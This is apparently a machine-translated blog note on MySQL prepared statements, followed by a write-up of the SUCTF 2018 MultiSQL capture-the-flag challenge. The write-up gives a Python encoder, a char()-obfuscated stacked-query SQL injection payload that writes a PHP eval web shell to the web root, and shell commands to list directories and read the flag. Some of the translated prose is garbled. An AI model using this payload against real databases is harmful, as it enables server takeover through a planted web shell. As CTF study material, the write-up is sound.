MySQL Traditional treatment ：

 Client preparation sql sentence 

 send out sql Statement to MySQL The server 

MySQL Server execution sql sentence 

 The server returns the execution result to the client 

Basic preprocessing strategies ：

 take sql Statement forces a split into two ：
 The first part is the same command and structure as before 
 The second part is the following variable data part 
 First, put the front sql The statement is sent to MySQL The server , Let it perform overflow preprocessing first （ There is no real implementation ） First send sql The variable data parts in the statement are represented by a data placeholder , Like question marks ?

Preprocessing without parameters

Prepare preprocessing statements

prepare Statement name from “ Pretreated sql sentence ”;

prepare sql_1 from "select * from pdo";

Execute preprocessing statements

execute sql_1;

Delete preprocessing statements

drop prepare sql_1;

Preprocessing with parameters

Prepare preprocessing statements

prepare sql_2 from "select * from pdo where id = ?";

Define parameter variables

set @id=2;

The ginseng , Perform preprocessing

execute sql_2 using @id; 

Delete

drop prepare sql_2;

[SUCTF 2018]MultiSQL Pretreatment injection

Use char() Bypass

str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str=len(str)
for i in range(0,len_str):
	if i == 0:
		print('char(%s'%ord(str[i]),end="")
	else:
		print(',%s'%ord(str[i]),end="")
print(')')

payload:

?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;

visit /favicon/shell.php

system('ls /');  // In the root directory 
system('cd /;cat *f*');

XOR injection

1^1^1 Return to true